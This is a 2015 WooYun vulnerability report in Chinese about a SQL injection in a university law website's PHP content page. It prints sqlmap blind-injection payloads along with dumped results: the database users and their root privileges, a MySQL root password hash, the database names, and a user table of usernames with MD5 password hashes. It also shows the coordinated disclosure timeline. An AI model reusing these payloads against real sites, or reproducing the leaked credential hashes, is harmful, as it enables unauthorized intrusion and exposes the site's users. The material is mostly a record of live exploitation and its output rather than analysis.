乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-23: 细节已通知厂商并且等待厂商处理中 2015-08-24: 厂商已经确认,细节仅向厂商公开 2015-09-03: 细节向核心白帽子及相关领域专家公开 2015-09-13: 细节向普通白帽子公开 2015-09-23: 细节向实习白帽子公开 2015-10-08: 细节向公众公开
**.**.**.**/index.php/Index/content_zh/id/1220*/link/rcpy
Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:80/index.php/Index/content_zh/id/1220 AND 8903=8903/link/rcpy Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://**.**.**.**:80/index.php/Index/content_zh/id/1220 AND SLEEP(5)/link/rcpy---[23:08:42] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5.0.11
存在注入,接下来各种爆。
database management system users privileges:[*] %root% (administrator) [25]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: UPDATE
database management system users password hashes:[*] root [1]: password hash: *2F1C808CCFD375BF1AABB2943B09DDBFFA8B9820
[23:24:27] [INFO] retrieved: root@localhostcurrent user: 'root@localhost'[23:25:07] [INFO] fetching current database[23:25:07] [INFO] retrieved: wuhanlawcurrent database: 'wuhanlaw'[23:25:31] [INFO] testing if current user is DBA[23:25:31] [INFO] fetching current usercurrent user is DBA: True
available databases [11]:[*] a0104225036[*] information_schema[*] interwhuedu_0[*] interwhuedu_en_0[*] interwhuedu_privatelaw[*] lawwhuedu_0[*] makc_jjh[*] mysql[*] test[*] wuhanlaw[*] wuhanlaw2
Database: wuhanlawTable: ch_user[3 entries]+-------------+----------------------------------+| username | password |+-------------+----------------------------------+| dengzhaohui | 43b1fc9f90ddeb23b6107d43332e2c35 || admin | 58756385857be77381619183339c7f07 || anying | 9561a6f1aad6fef99dfeffcecdd04cc4 |+-------------+----------------------------------+
OK,教育网,友情检测,到此为止。
同上。
你们更专业。
危害等级:中
漏洞Rank:6
确认时间:2015-08-24 08:23
通知处理中
暂无